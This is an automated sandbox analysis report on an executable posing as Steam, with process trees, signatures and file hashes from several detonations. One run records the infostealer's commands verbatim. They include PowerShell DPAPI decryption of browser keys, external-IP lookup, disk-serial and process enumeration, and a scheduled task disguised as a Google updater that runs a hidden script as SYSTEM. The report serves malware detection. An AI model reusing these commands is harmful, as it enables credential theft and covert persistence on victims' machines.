Analysis Overview
SHA256
c8b514c3f087a82fe2d755bc65404e59e14a45fb9c737e08eeccb8f89cf74a62
Threat Level: Shows suspicious behavior
The file Steam_6n0hahx7.exe was found to be: Shows suspicious behavior.
Malicious Activity Summary
Loads dropped DLL
Reads user/profile data of web browsers
Looks up external IP address via web service
An obfuscated cmd.exe command-line is typically used to evade detection.
Program crash
Unsigned PE
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates processes with tasklist
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-07 19:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
141s
Max time network
156s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2380 wrote to memory of 1524 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2380 wrote to memory of 1524 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2380 wrote to memory of 1524 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1524 -ip 1524
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1524 -s 536
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
147s
Max time network
159s
Command Line
Signatures
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb74663cb8,0x7ffb74663cc8,0x7ffb74663cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3228 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5344 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f2dc80f5403feb8461b7ffa09890d6a0 |
| SHA1 | d5b61e6d672e7e71571e0132e21cead181da8805 |
| SHA256 | eadeadba37eed18e5acba408d7e076270b00403fed372b77164577232232428a |
| SHA512 | 5e2119529b99b76be105c43714e4b9977ee2147172c1c44e92bd9b41fa7a66f55d4073c864aac668a912aff2898bd216fb38f2fe34ef65de69ad12965218caf5 |
\??\pipe\LOCAL\crashpad_4476_JHRTWPPTEDYDPOFR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5c48e8b68231fb5b2d7f1188b930bc0e |
| SHA1 | 1822aef5da8fdd47626fb91afcf79a2be175a325 |
| SHA256 | c3b287c29eaa57166b2ab1ba9bd0aaced13cc2f946a04b8d708ac429187fe944 |
| SHA512 | 2bd09b83e44e0104fbe080a8573690217dc9fbf7fd59ff25a1a9e9ebd2d87ac533f9b99350773d081a7e748b39657115a13e94538b153bceb13ecdfc4672a0f8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d50fab4f191f0582ba580bd8c2ec6636 |
| SHA1 | 7ed0a80d9d43630f59b88508663dc21d5b38b5a0 |
| SHA256 | 25bcc9b5dd1216e6a855b874b2e28fdf3d7e3bab4490e6e22d839c6f8d728cbe |
| SHA512 | 23eb4c0a5bf579993472d63fb3bc09d6e1575142cdac8c6bd8dd97166cf811060d62cf3df4bc9e3ba8f771ecefc8fa8144674719c934072b8ddfb6b36a176c3d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b3b3b827849457196cb3f397b0443645 |
| SHA1 | 92e6daa8f371d741582e32f12d4ccad8c0e1457a |
| SHA256 | 01636fae3192485dacc97b07293bd30e9cef95b016b0117f3d4f6eb018c6b728 |
| SHA512 | 108e9986e2e3da6a4d47218637435625ff2513105bfc7a5c960f53a5607ed3ae3a7a2f334bd9e017de4a84b80c000835dbfb635666a45b3ea69f1185b1ee8d85 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f32a1636fd775617d65fcf35e84c5d0a |
| SHA1 | 6bc6a2953d66d39a4bf8c60a6f8b8fa5bac0473f |
| SHA256 | fc411ca391d91cd2c3012f8c2e4fed1a0a9726ab350bb7ca8447ba3259c8f8b7 |
| SHA512 | 0eb37af5c3c59e95d1a61af2d6ac3e3efb0897bb0720eeebf82f31197e14bd1c890d88f53b272a646011d47d5c2af99be8ab70c5d2cd2f872c7196e559dbccdc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240214-en
Max time kernel
85s
Max time network
91s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
146s
Max time network
155s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
28s
Max time network
52s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2332 wrote to memory of 5064 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 5064 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 5064 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5064 -ip 5064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 460
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
86s
Max time network
96s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:49
Platform
win11-20240221-en
Max time kernel
141s
Max time network
162s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
28s
Max time network
142s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4704 wrote to memory of 3632 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4704 wrote to memory of 3632 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4704 wrote to memory of 3632 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3632 -ip 3632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 468
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:46
Platform
win11-20240221-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
4s
Max time network
10s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Steam.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Steam.exe
"C:\Users\Admin\AppData\Local\Temp\Steam.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,142,201,190,236,119,164,249,229,41,6,194,37,239,167,184,163,113,143,87,88,255,118,110,201,100,66,207,20,108,252,227,68,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,182,249,61,2,159,110,24,25,13,161,36,186,14,75,78,120,216,53,125,15,64,189,193,186,132,116,79,103,202,186,94,48,0,0,0,152,140,232,44,188,166,20,101,3,247,171,153,99,3,74,178,253,152,73,92,23,31,142,140,189,199,211,146,124,26,26,111,64,189,223,72,118,238,118,127,166,126,39,230,8,162,176,235,64,0,0,0,180,244,68,231,242,166,178,241,72,22,15,194,14,178,91,91,84,8,166,233,155,101,48,41,247,47,79,140,45,53,245,186,235,199,214,238,172,241,176,13,60,70,213,189,216,77,98,203,211,240,139,15,138,215,20,227,41,204,192,211,179,39,141,8), $null, 'CurrentUser')"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,142,201,190,236,119,164,249,229,41,6,194,37,239,167,184,163,113,143,87,88,255,118,110,201,100,66,207,20,108,252,227,68,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,182,249,61,2,159,110,24,25,13,161,36,186,14,75,78,120,216,53,125,15,64,189,193,186,132,116,79,103,202,186,94,48,0,0,0,152,140,232,44,188,166,20,101,3,247,171,153,99,3,74,178,253,152,73,92,23,31,142,140,189,199,211,146,124,26,26,111,64,189,223,72,118,238,118,127,166,126,39,230,8,162,176,235,64,0,0,0,180,244,68,231,242,166,178,241,72,22,15,194,14,178,91,91,84,8,166,233,155,101,48,41,247,47,79,140,45,53,245,186,235,199,214,238,172,241,176,13,60,70,213,189,216,77,98,203,211,240,139,15,138,215,20,227,41,204,192,211,179,39,141,8), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,134,57,53,184,109,103,87,41,96,93,54,175,83,254,108,1,199,63,183,145,59,67,77,142,131,41,66,140,251,225,30,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,50,139,195,109,157,54,95,31,122,27,243,129,91,106,56,19,120,167,108,199,123,190,180,44,26,193,243,188,5,249,100,159,48,0,0,0,79,190,164,90,47,210,54,200,237,40,110,74,250,111,141,178,90,89,142,131,113,94,149,123,17,190,228,107,254,66,96,184,159,117,236,86,51,7,28,128,111,234,232,223,185,23,255,90,64,0,0,0,60,144,165,167,84,157,208,17,93,60,160,32,92,249,63,246,132,77,226,246,5,218,17,205,23,195,165,110,254,55,95,129,234,6,241,102,134,123,200,151,222,54,233,191,21,50,221,233,126,250,119,218,52,59,70,62,8,46,61,164,64,24,209,159), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,134,57,53,184,109,103,87,41,96,93,54,175,83,254,108,1,199,63,183,145,59,67,77,142,131,41,66,140,251,225,30,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,50,139,195,109,157,54,95,31,122,27,243,129,91,106,56,19,120,167,108,199,123,190,180,44,26,193,243,188,5,249,100,159,48,0,0,0,79,190,164,90,47,210,54,200,237,40,110,74,250,111,141,178,90,89,142,131,113,94,149,123,17,190,228,107,254,66,96,184,159,117,236,86,51,7,28,128,111,234,232,223,185,23,255,90,64,0,0,0,60,144,165,167,84,157,208,17,93,60,160,32,92,249,63,246,132,77,226,246,5,218,17,205,23,195,165,110,254,55,95,129,234,6,241,102,134,123,200,151,222,54,233,191,21,50,221,233,126,250,119,218,52,59,70,62,8,46,61,164,64,24,209,159), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Users\Admin\AppData\Local\Temp\Steam.exe
